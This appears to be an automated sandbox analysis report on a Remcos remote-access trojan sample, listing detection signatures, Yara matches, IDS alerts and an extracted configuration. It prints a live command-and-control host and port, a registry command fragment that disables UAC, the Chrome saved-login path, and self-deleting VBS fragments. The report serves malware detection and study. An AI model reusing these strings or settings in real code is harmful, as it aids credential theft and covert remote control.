Windows Analysis Report
1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe

Overview

General Information

Sample name: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
Analysis ID: 1587333
MD5: 90bf80022402e68248981833dcfacde0
SHA1: 60b5b5973c52ed76af313681a6c24f264b88a3b4
SHA256: be4f15c4e0df6828dfcb3b91b22e77558bd02cb49afdd6089ff846651c5c6e98
Tags: base64-decoded, exe, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Installs a global keyboard hook
Machine Learning detection for sample
Abnormal high CPU Usage
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate processes and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware configuration: {"Host:Port:Password": ["juanosorio.loseyourip.com:1997:1"], "Assigned name": "09-01-25", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JLQBNY", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Yara matches, type: SAMPLE
Source | Rule | Description | Author | Strings
1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6ad08:$a1: Remcos restarted by watchdog!
  • 0x6b280:$a3: %02i:%02i:%02i:%03i
1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | REMCOS_RAT_variants | unknown | unknown
  • 0x64f94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64f10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65410:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65a10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65004:$str_b2: Executing file:
  • 0x65e4c:$str_b3: GetDirectListeningPort
  • 0x65800:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65980:$str_b7: \update.vbs
  • 0x6502c:$str_b9: Downloaded file:
  • 0x65018:$str_b10: Downloading file:
  • 0x650bc:$str_b12: Failed to upload file:
  • 0x65e14:$str_b13: StartForward
  • 0x65e34:$str_b14: StopForward
  • 0x658d8:$str_b15: fso.DeleteFile "
  • 0x6586c:$str_b16: On Error Resume Next
  • 0x65908:$str_b17: fso.DeleteFolder "
  • 0x650ac:$str_b18: Uploaded file:
  • 0x6506c:$str_b19: Unable to delete:
  • 0x658a0:$str_b20: while fso.FileExists("
  • 0x65549:$str_c0: [Firefox StoredLogins not found]

Yara matches, type: DROPPED
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security

Yara matches, type: MEMORY
Source | Rule | Description | Author | Strings
00000001.00000002.3753688291.000000000228F000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security

Yara matches, type: UNPACKEDPE
Source | Rule | Description | Author | Strings
1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6ad08:$a1: Remcos restarted by watchdog!
  • 0x6b280:$a3: %02i:%02i:%02i:%03i
1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x64f94:$str_a1: C:\Windows\System32\cmd.exe
  • 0x64f10:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x64f10:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x65410:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x65a10:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x65004:$str_b2: Executing file:
  • 0x65e4c:$str_b3: GetDirectListeningPort
  • 0x65800:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x65980:$str_b7: \update.vbs
  • 0x6502c:$str_b9: Downloaded file:
  • 0x65018:$str_b10: Downloading file:
  • 0x650bc:$str_b12: Failed to upload file:
  • 0x65e14:$str_b13: StartForward
  • 0x65e34:$str_b14: StopForward
  • 0x658d8:$str_b15: fso.DeleteFile "
  • 0x6586c:$str_b16: On Error Resume Next
  • 0x65908:$str_b17: fso.DeleteFolder "
  • 0x650ac:$str_b18: Uploaded file:
  • 0x6506c:$str_b19: Unable to delete:
  • 0x658a0:$str_b20: while fso.FileExists("
  • 0x65549:$str_c0: [Firefox StoredLogins not found]

                          Stealing of Sensitive Information

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, ProcessId: 7704, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata IDS alerts
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T07:50:17.643480+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49704 | 179.15.136.6 | 1997 | TCP
2025-01-10T07:50:18.965560+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49706 | 178.237.33.50 | 80 | TCP
2025-01-10T07:50:16.779873+0100 | 2834937 | 1 | A Network Trojan was detected | 192.168.2.7 | 52907 | 1.1.1.1 | 53 | UDP


                          AV Detection

Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Avira: detected
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["juanosorio.loseyourip.com:1997:1"], "Assigned name": "09-01-25", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-JLQBNY", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | ReversingLabs: Detection: 71%
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Virustotal: Detection: 64%
Source: Yara match | File source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.3753688291.000000000228F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_00432B45 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,1_2_00432B45
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----

                          Exploits

Source: Yara match | File source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTR

                          Privilege Escalation

Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_00406764 _wcslen,CoGetObject,1_2_00406764
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,1_2_0040B335
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,1_2_0040B53A
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_0041B63A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,1_2_0041B63A
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_0044D7F9 FindFirstFileExA,1_2_0044D7F9
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,1_2_004089A9
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_00406AC2 FindFirstFileW,FindNextFileW,1_2_00406AC2
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,1_2_00407A8C
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,1_2_00408DA7
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_00418E5F FindFirstFileW,FindNextFileW,FindNextFileW,1_2_00418E5F
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,1_2_00406F06

                          Networking

Source: Network traffic | Suricata IDS: 2834937 - Severity 1 - ETPRO MALWARE Observed DNS Query to Abused DDNS (loseyourip .com) : 192.168.2.7:52907 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49704 -> 179.15.136.6:1997
Source: Malware configuration extractor | URLs: juanosorio.loseyourip.com
Source: global traffic | TCP traffic: 192.168.2.7:49704 -> 179.15.136.6:1997
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 179.15.136.6
Source: Joe Sandbox View | IP Address: 178.237.33.50
Source: Joe Sandbox View | ASN Name: ColombiaMovilCO
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49706 -> 178.237.33.50:80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_00426302 recv,1_2_00426302
Source: global traffic | DNS traffic detected: DNS query: juanosorio.loseyourip.com
Source: global traffic | DNS traffic detected: DNS query: geoplugin.net
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000692000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/WZ
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000692000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000692000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000671000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | String found in binary or memory: http://geoplugin.net/json.gp/C
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000671000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpc
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpn.net/
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000671000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpu
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, 00000001.00000003.1335196684.0000000000671000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gpx

                          Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_004099E4 SetWindowsHookExA 0000000D,004099D0,00000000,1_2_004099E4
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_00415B5E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,1_2_00415B5E
Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,1_2_00409B10
Source: Yara match | File source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTR

                          E-Banking Fraud

Source: Yara match | File source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE
Source: Yara match | File source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.3753688291.000000000228F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.3753451865.0000000000671000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.1312795362.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.3753451865.000000000062E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe PID: 7704, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                          Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe | Code function: 1_2_0041BD82 SystemParametersInfoW,1_2_0041BD82

                          System Summary

Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, type: SAMPLE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 1.0.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
Source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants | Author: unknown
Source: 1.2.1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 | Author: unknown
